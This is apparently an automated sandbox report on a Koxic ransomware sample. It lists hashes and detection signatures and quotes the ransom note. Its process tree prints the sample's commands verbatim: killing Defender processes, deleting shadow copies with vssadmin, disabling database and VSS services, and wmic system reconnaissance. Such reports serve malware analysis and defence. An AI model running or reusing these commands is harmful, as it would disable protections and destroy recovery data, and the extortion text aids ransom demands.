Overview

overview

10

Static

static

7a5e20e021...e9.exe

windows7_x64

10

7a5e20e021...e9.exe

windows10_x64

10

Analysis

  • max time kernel
    137s
  • max time network
    158s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    30-01-2022 23:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe

  • Size

    379KB

  • MD5

    5a44e1d5691ec9395281123ea0bd501f

  • SHA1

    64566d5049479227d2eff3d983b127c0339974cd

  • SHA256

    7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9

  • SHA512

    55d85e77f70f25bae6cf8bbf5dd787d5771c2e38e99461b608f6375be9cb0b1031f3c0268b82eb03db05eb88ce37d5f37afbfc69ab0c4f90791a706013b168c8

Score
10/10
koxicevasionransomwaretrojan

Malware Config

Extracted

Path

C:\Documents and Settings\WANNA_RECOVER_KOXIC_FILEZ_IHLCL.txt

Ransom Note
Hello, all your important files are encrypted and sensitive data leaked. To decrypt your files and avoid other unpleasant things you need to buy special decryption tool. Contact us via [email protected] or [email protected] and tell your UserID. This is the only way to decrypt your files and avoid publi? disclosure of data . Do not try to use third party software (it may corrupt your files). We respect black market rules. We can confirm the ability to decrypt your files (and of course the evidence of the leak ), Send us several unimportant files (do not try to deceive us). Your UserID (send it to us for decryption): 2AD7DD888D6514F5D319045EDC7B8F080A23A192B1170665FB6D3DC23A984A9566360840A3B4272AE4698E903D89C81D94111B1623723CE4E27D7A21AFE9B1E061675D09C287BDAF42FB1190BCF2EF96359D78F4358EF600200577B7514C49C255B344E6386B9F730231A195F3B5F6A335E5ADAD46F0A74433AADA6D58CD72F8774574B970D12CD04292C4D9556A39158963C834AB28B58AE43364F9BE6A1409DECA5132AFF6B8FC76A000479F1413E4AE2CE53B71EEDF60697A5157556EDBCE7D3A990E3F43FD39C6BD655DAE8D4B7722B92FE6A881E407DB05571875EB66BD6251F4C3DA6458164301708A9D46FF2BF164570D657B73495526A94884EB15463082010A0282010100BC1B0639F36CA2C5CC202A706AE7F2F7CC47FEE93FF57C16EDE5EE5A0DBDDF106E04F1D2586162A4DB3E4D71CC52F77803EEDAB64D8A7CBA78662642889F5F69FE8B4D368895A9DE54CED962031800E5A882E9CF0C8BBB80F93BB93E3A24D4A03AECCB64F8D24041CEFC7204C7EAFD79B9D123616D41A83A1EB9F3DDAC679474E178A9F1A79AAB1AC2E385DADCCDDB62445AAEC65230A02657379306F70324A1B668B17F2F105082FB3CAC1DFB0BE102BC0C4F3183A42D65BBE92C4DCF91586FE97E67BA46228C8514CD43D7157F374487FC3733D9D679CA58256DAB89469F2E1F8C9E3197D0E2D9CB9AA2CA8A63FEA0C8399A1E30DBE7902BFAA7D093FA73A30203010001DC43F80F875F6C9CE81B93705319B8CD49484C434C

Signatures

  • Koxic

    A C++ written ransomware first seen in late 2021.

    ransomwarekoxic
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Disables taskbar notifications via registry modification
    evasion
  • Windows security modification 2 TTPs 8 IoCs
    evasiontrojan
  • Drops file in Program Files directory 64 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
    "C:\Users\Admin\AppData\Local\Temp\7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe"
    1⤵
    • Windows security modification
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2416
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /F /IM MSASCuiL.exe taskkill /F /IM MSMpeng.exe taskkill /F /IM msseces.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3700
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /F /IM MSASCuiL.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1092
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet sc config browser sc config browser start=enabled sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4080
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1112
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo OS INFO: > %TEMP%\KLHWARDQM"
      2⤵
        PID:376
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "wmic OS get Caption,CSDVersion,OSArchitecture,Version >> %TEMP%\KLHWARDQM"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:748
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic OS get Caption,CSDVersion,OSArchitecture,Version
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1564
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "echo BIOS INFO: >> %TEMP%\KLHWARDQM"
        2⤵
          PID:2528
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version >> %TEMP%\KLHWARDQM"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2356
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2168
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "echo CPU INFO: >> %TEMP%\KLHWARDQM"
          2⤵
            PID:4084
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c "wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors >> %TEMP%\KLHWARDQM"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3160
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors
              3⤵
                PID:3060
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c "echo MEMPHYSICAL INFO: >> %TEMP%\KLHWARDQM"
              2⤵
                PID:3128
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c "wmic MEMPHYSICAL get MaxCapacity >> %TEMP%\KLHWARDQM"
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2984
                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                  wmic MEMPHYSICAL get MaxCapacity
                  3⤵
                    PID:2076
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c "echo MEMORYCHIP: INFO >> %TEMP%\KLHWARDQM"
                  2⤵
                    PID:3684
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c "wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag >> %TEMP%\KLHWARDQM"
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3308
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag
                      3⤵
                        PID:2184
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c "echo NIC INFO: >> %TEMP%\KLHWARDQM"
                      2⤵
                        PID:980
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c "wmic NIC get Description, MACAddress, NetEnabled, Speed >> %TEMP%\KLHWARDQM"
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1172
                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                          wmic NIC get Description, MACAddress, NetEnabled, Speed
                          3⤵
                            PID:812
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c "echo DISKDRIVE INFO: >> %TEMP%\KLHWARDQM"
                          2⤵
                            PID:3772
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c "wmic DISKDRIVE get InterfaceType, Name, Size, Status >> %TEMP%\KLHWARDQM"
                            2⤵
                              PID:1252
                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                wmic DISKDRIVE get InterfaceType, Name, Size, Status
                                3⤵
                                  PID:1484
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c "echo USERACCOUNT INFO: >> %TEMP%\KLHWARDQM"
                                2⤵
                                  PID:1028
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c "wmic USERACCOUNT get Caption, Name, PasswordRequired, Status >> %TEMP%\KLHWARDQM"
                                  2⤵
                                    PID:1412
                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                      wmic USERACCOUNT get Caption, Name, PasswordRequired, Status
                                      3⤵
                                        PID:1564
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c "echo IPCONFIG: >> %TEMP%\KLHWARDQM"
                                      2⤵
                                        PID:2036
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c "ipconfig >> %TEMP%\KLHWARDQM"
                                        2⤵
                                          PID:2120
                                          • C:\Windows\SysWOW64\ipconfig.exe
                                            ipconfig
                                            3⤵
                                            • Gathers network information
                                            PID:2168
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c "echo DATABASES FILES: >> %TEMP%\KLHWARDQM"
                                          2⤵
                                            PID:1820
                                        • C:\Windows\system32\vssvc.exe
                                          C:\Windows\system32\vssvc.exe
                                          1⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2128

                                        Network

                                        MITRE ATT&CK Enterprise v6

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads